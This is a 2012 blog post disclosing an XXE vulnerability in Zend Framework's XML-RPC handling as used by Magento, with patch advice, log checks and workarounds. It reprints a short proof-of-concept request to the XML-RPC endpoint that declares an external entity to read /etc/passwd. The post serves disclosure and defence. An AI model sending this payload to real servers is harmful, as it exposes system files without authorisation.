Friday, July 6, 2012

Magento / Zend Framework Vulnerability

There is a serious or critical vulnerability in the Zend Framework which Magento relies heavily on. For those of you not familiar with Magento it is both and Open Source and Enterprise E-commerce platform. Those utilizing Magento's XMLRPC API's will be vulnerable to the Zend Platform XML RPC package vulnerability.

Magento has released a bulletin which advises all of it's users to apply a patch which was released yesterday by Magento which is 10 Days after the release by ZEND

Why am I writing about a disclosure that is 11 days old ? well Magento is a heavily used product out there and those using it may not be aware an official patch was released yesterday by the company. I also believe we should freely share what is found and help users out there mitigate the risks.


Credit for discovering the vulnerability goes to the team at SEC Consult Vulnerability Lab Johannes Greil and Kestutis Gudinavicius

Proof of Concept: 
Credit SEC Consult Vulnerability Lab

Magento :

POST /index.php/api/xmlrpc HTTP/1.1
Host: $host

<?xml version="1.0"?>
 <!DOCTYPE foo [  
  <!ELEMENT methodName ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>

Example using SOAPUI request

As you can see above i was able to retrieve the "/etc/passwd" file from the system using a call to the XMLRPC API on Magento.


Patch your systems immediately!!!

Magento has made the patches available (above link) in their solution section for both the community and Enterprise Editions as of yesterday. You can do this live with little impact to your site. If you are using cache just make sure to flush that or restart your apache server

How do I know if I have already fallen victim to this vulnerability ?
This will be tough to tell, if you do not use the XMLRPC Magento API look for POST requests to the API per the below in your access logs - - [06/Jul/2012:16:25:52 -0400] "POST /index.php/api/xmlrpc HTTP/1.1" 200 722 "-" "Jakarta Commons-HttpClient/3.1"

What if I cannot patch this right now and want to protect myself even though I am not using the Magento XMLRPC API ?

Well you have two options one is to follow Magento's workaround below

Workaround (taken from the magento blog post)

If the patch cannot be applied immediately, the following instructions can be followed to temporarily disable the RPC functionality that contains the vulnerability. Please be advised, any integrations that rely on the XMLRPC API functionality will no longer work after this workaround is implemented.
  • 1. On the Magento web server, navigate to the www-root where Magento app files are stored.
  • 2. In the wwwroot, navigate to /app/code/core/Mage/Api/controllers.
  • 3. Open XmlrpcController.php for editing.
  • 4. Comment out or delete the body of the method: public indexAction()
  • 5. Save the changes

Optional Workaround
Deny access to the XMLRPC API URI either via apache (rewrite/LocationMatch) or if you are using ModSecurity use that.

URI: /index.php/api/xmlrpc


Special Thanks to @thronic for bringing this vulnerability to my attention today, great PHP developer if you are looking for one.

© Bruce Martins
All rights reserved
Bloggerized by Free Blogger Templates
Instruction by Blog Teacher